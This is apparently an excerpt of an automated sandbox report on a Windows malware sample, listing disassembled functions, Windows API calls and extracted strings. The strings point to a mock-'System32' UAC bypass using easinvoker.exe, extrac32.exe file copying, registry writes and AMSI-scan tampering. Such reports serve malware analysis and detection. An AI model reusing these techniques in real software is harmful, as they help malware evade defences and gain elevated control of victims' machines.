call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 ExitProcess 6938->7121 7860 28c69bb-28c6b4f call 28a49bc call 28bc5bc call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 EnumSystemLocalesA 6939->7860 7861 28c69b6-28c69b9 6939->7861 7120->7121 7137 28c6cf2-28c6fc5 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7e18 7120->7137 7538 28c6fcb-28c729d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 7137->7538 7539 28c72a2-28c74a3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc call 28b7f48 7137->7539 7505->7504 7538->7539 7539->7121 7569->7568 7860->6938 7861->7860
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                              • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                              • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC437
                                                                                                                              • Part of subcall function 028BC3F8: NtCreateFile.NTDLL(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000), ref: 028BC471
                                                                                                                              • Part of subcall function 028BC3F8: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 028BC49E
                                                                                                                              • Part of subcall function 028BC3F8: NtClose.NTDLL(?), ref: 028BC4A7
                                                                                                                            • Sleep.KERNEL32(00001770,UacScan,02900BA8,028C8FEC,ScanString,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC,ScanBuffer,02900BA8,028C8FEC,OpenSession,02900BA8,028C8FEC), ref: 028C3094
                                                                                                                              • Part of subcall function 028BC368: RtlInitUnicodeString.NTDLL(?,?), ref: 028BC390
                                                                                                                              • Part of subcall function 028BC368: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 028BC3A6
                                                                                                                              • Part of subcall function 028BC368: NtDeleteFile.NTDLL(?), ref: 028BC3C5
                                                                                                                            • WinExec.KERNEL32(00000000,028C953C), ref: 028C436D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$File$NameName_$AddressCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                            • String ID: .url$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CO.bat$HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$er.e$s.d
                                                                                                                            • API String ID: 1793215137-2603961859
                                                                                                                            • Opcode ID: 5ead63ff801801121476e0dddeb9845168b4256f0d1822bbca8d4746cf5df041
                                                                                                                            • Instruction ID: bd7b063ff216a8bcbd7e5ead88f203ef37fae1faeb22c7fb8f85f544eee35fda
                                                                                                                            • Opcode Fuzzy Hash: 5ead63ff801801121476e0dddeb9845168b4256f0d1822bbca8d4746cf5df041
                                                                                                                            • Instruction Fuzzy Hash: 71530C3DA501589FEF51EB68D890EADB3B6BF85700F2044E5A009E7614DFB0AE85CF52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028C4EFD Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 942processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 10380 28c4efd-28c565b call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4964 call 28a4698 call 28bd318 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 10591 28c6190-28c638f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 10380->10591 10592 28c5661-28c5cb3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a47b0 call 28a4964 WinExec call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4964 call 28a4698 call 28b9e70 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a3694 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 10380->10592 10709 28c6b54-28c6cd7 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 10591->10709 10710 28c6395-28c69b4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a2ee0 call 28a2f08 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 GetCurrentProcess call 28b7968 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 10591->10710 11152 28c5cba-28c5f98 call 28b5aa8 call 28a4b90 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc RtlMoveMemory call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28ba1c0 call 28a36c4 10592->11152 11153 28c5cb5-28c5cb8 10592->11153 10845 28c6cdd-28c6cec call 28a48b0 10709->10845 10846 28c74a8-28c8b96 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 * 16 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4698 * 2 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 ExitProcess 10709->10846 11413 28c69bb-28c6b4f call 28a49bc call 28bc5bc call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 EnumSystemLocalesA 10710->11413 11414 28c69b6-28c69b9 10710->11414 10845->10846 10859 28c6cf2-28c6fc5 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bd198 call 28a4824 call 28a4964 call 28a4698 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a7e18 10845->10859 11180 28c6fcb-28c729d call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28bc74c call 28a44f4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4da4 * 2 call 28a4728 call 28bc3f8 10859->11180 11181 28c72a2-28c74a3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a49bc call 28b7f48 10859->11181 11153->11152 11180->11181 11181->10846 11413->10709 11414->11413
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A,?), ref: 028B7C18
                                                                                                                              • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                              • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(0290434C,00000000), ref: 028B7C37
                                                                                                                              • Part of subcall function 028BD318: RegOpenKeyA.ADVAPI32(?,00000000,02904798), ref: 028BD35C
                                                                                                                              • Part of subcall function 028BD318: RegSetValueExA.ADVAPI32(02904798,00000000,00000000,00000001,00000000,0290479C,?,00000000,02904798,00000000,028BD3C7), ref: 028BD394
                                                                                                                              • Part of subcall function 028BD318: RegCloseKey.ADVAPI32(02904798,02904798,00000000,00000000,00000001,00000000,0290479C,?,00000000,02904798,00000000,028BD3C7), ref: 028BD39F
                                                                                                                            • WinExec.KERNEL32(00000000,00000000), ref: 028C57F9
                                                                                                                              • Part of subcall function 028B9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 028B9F33
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 028C5D7B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                            • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                            • API String ID: 897696978-872072817
                                                                                                                            • Opcode ID: 331da04d179b9290a68003559e3011f5a7a20046f7f6c456a7a690c75e06f7e7
                                                                                                                            • Instruction ID: a9e2093cd476efcb10323525bee74ec9ed9aa622398ea1e5ad2deb1f3de7d291
                                                                                                                            • Opcode Fuzzy Hash: 331da04d179b9290a68003559e3011f5a7a20046f7f6c456a7a690c75e06f7e7
                                                                                                                            • Instruction Fuzzy Hash: 63920B3DA501589FEF11EB68D8A0ADDB3B6BF85700F2084A5A149E7714DFB0AE85CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A1727 Relevance: 9.0, APIs: 7, Instructions: 288sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12094 28a1727-28a1736 12095 28a1968-28a196d 12094->12095 12096 28a173c-28a174c 12094->12096 12097 28a1973-28a1984 12095->12097 12098 28a1a80-28a1a83 12095->12098 12099 28a174e-28a175b 12096->12099 12100 28a17a4-28a17ad 12096->12100 12101 28a1938-28a1945 12097->12101 12102 28a1986-28a19a2 12097->12102 12104 28a1a89-28a1a8b 12098->12104 12105 28a1684-28a16ad VirtualAlloc 12098->12105 12106 28a175d-28a176a 12099->12106 12107 28a1774-28a1780 12099->12107 12100->12099 12103 28a17af-28a17bb 12100->12103 12101->12102 12108 28a1947-28a195b Sleep 12101->12108 12113 28a19b0-28a19bf 12102->12113 12114 28a19a4-28a19ac 12102->12114 12103->12099 12115 28a17bd-28a17c9 12103->12115 12116 28a16df-28a16e5 12105->12116 12117 28a16af-28a16dc call 28a1644 12105->12117 12109 28a176c-28a1770 12106->12109 12110 28a1794-28a17a1 12106->12110 12111 28a1782-28a1790 12107->12111 12112 28a17f0-28a17f9 12107->12112 12108->12102 12118 28a195d-28a1964 Sleep 12108->12118 12124 28a17fb-28a1808 12112->12124 12125 28a182c-28a1836 12112->12125 12120 28a19d8-28a19e0 12113->12120 12121 28a19c1-28a19d5 12113->12121 12119 28a1a0c-28a1a22 12114->12119 12115->12099 12122 28a17cb-28a17de Sleep 12115->12122 12117->12116 12118->12101 12131 28a1a3b-28a1a47 12119->12131 12132 28a1a24-28a1a32 12119->12132 12128 28a19fc-28a19fe call 28a15cc 12120->12128 12129 28a19e2-28a19fa 12120->12129 12121->12119 12122->12099 12126 28a17e4-28a17eb Sleep 12122->12126 12124->12125 12130 28a180a-28a181e Sleep 12124->12130 12133 28a18a8-28a18b4 12125->12133 12134 28a1838-28a1863 12125->12134 12126->12100 12139 28a1a03-28a1a0b 12128->12139 12129->12139 12130->12125 12141 28a1820-28a1827 Sleep 12130->12141 12135 28a1a68 12131->12135 12136 28a1a49-28a1a5c 12131->12136 12132->12131 12142 28a1a34 12132->12142 12137 28a18dc-28a18eb call 28a15cc 12133->12137 12138 28a18b6-28a18c8 12133->12138 12143 28a187c-28a188a 12134->12143 12144 28a1865-28a1873 12134->12144 12147 28a1a6d-28a1a7f 12135->12147 12146 28a1a5e-28a1a63 call 28a1500 12136->12146 12136->12147 12155 28a18fd-28a1936 12137->12155 12159 28a18ed-28a18f7 12137->12159 12150 28a18ca 12138->12150 12151 28a18cc-28a18da 12138->12151 12141->12124 12142->12131 12148 28a18f8 12143->12148 12149 28a188c-28a18a6 call 28a1500 12143->12149 12144->12143 12145 28a1875 12144->12145 12145->12143 12146->12147 12148->12155 12149->12155 12150->12151 12151->12155
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 028A17D0
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 028A17E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 889f1f8079c9fb08bc9dcc9c5f16a33ff21abeec0c84488f27a849acf8aa42c3
                                                                                                                            • Instruction ID: 8b9bb7bfef76ab0150991103df70051167eff63a486319264ac4ccb4fc24b529
                                                                                                                            • Opcode Fuzzy Hash: 889f1f8079c9fb08bc9dcc9c5f16a33ff21abeec0c84488f27a849acf8aa42c3
                                                                                                                            • Instruction Fuzzy Hash: F1B1227EA052548FE715CF2CD4E8365BBE1EB84364F0886ADD44DCB389CB70A451CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028B7B20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID: irtualProtect$kernel32
                                                                                                                            • API String ID: 2099061454-2063912171
                                                                                                                            • Opcode ID: 2baccda0e96d6dae7153bf56e35cef52e2051e7db84d832db1dc5e3121e286aa
                                                                                                                            • Instruction ID: 2e1f6c07f506ef70b176d93c81ae1520bf1dd61d9f50b18dfc6974b4492d8498
                                                                                                                            • Opcode Fuzzy Hash: 2baccda0e96d6dae7153bf56e35cef52e2051e7db84d832db1dc5e3121e286aa
                                                                                                                            • Instruction Fuzzy Hash: 5A01717D600348AFEB01EFA8DC51EAAB7EDEF88710F514464B514E3780DA74AA108E25
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 028A1A8F Relevance: 7.7, APIs: 6, Instructions: 173sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 12173 28a1a8f-28a1a9b 12174 28a1b6c-28a1b6f 12173->12174 12175 28a1aa1-28a1aa5 12173->12175 12176 28a1c5c-28a1c60 12174->12176 12177 28a1b75-28a1b7f 12174->12177 12178 28a1b08-28a1b11 12175->12178 12179 28a1aa7-28a1aae 12175->12179 12180 28a16e8-28a170b call 28a1644 VirtualFree 12176->12180 12181 28a1c66-28a1c6b 12176->12181 12183 28a1b3c-28a1b49 12177->12183 12184 28a1b81-28a1b8d 12177->12184 12178->12179 12182 28a1b13-28a1b27 Sleep 12178->12182 12185 28a1adc-28a1ade 12179->12185 12186 28a1ab0-28a1abb 12179->12186 12202 28a170d-28a1714 12180->12202 12203 28a1716 12180->12203 12182->12179 12190 28a1b2d-28a1b38 Sleep 12182->12190 12183->12184 12191 28a1b4b-28a1b5f Sleep 12183->12191 12192 28a1b8f-28a1b92 12184->12192 12193 28a1bc4-28a1bd2 12184->12193 12187 28a1af3 12185->12187 12188 28a1ae0-28a1af1 12185->12188 12194 28a1abd-28a1ac2 12186->12194 12195 28a1ac4-28a1ad9 12186->12195 12196 28a1af6-28a1b03 12187->12196 12188->12187 12188->12196 12190->12178 12191->12184 12200 28a1b61-28a1b68 Sleep 12191->12200 12197 28a1b96-28a1b9a 12192->12197 12193->12197 12198 28a1bd4-28a1bd9 call 28a14c0 12193->12198 12196->12177 12204 28a1bdc-28a1be9 12197->12204 12205 28a1b9c-28a1ba2 12197->12205 12198->12197 12200->12183 12210 28a1719-28a1723 12202->12210 12203->12210 12204->12205 12209 28a1beb-28a1bf2 call 28a14c0 12204->12209 12206 28a1bf4-28a1bfe 12205->12206 12207 28a1ba4-28a1bc2 call 28a1500 12205->12207 12213 28a1c2c-28a1c59 call 28a1560 12206->12213 12214 28a1c00-28a1c28 VirtualFree 12206->12214 12209->12205
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000), ref: 028A1B17
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 028A1B31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_24_2_28a1000_Ucvuiswb.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
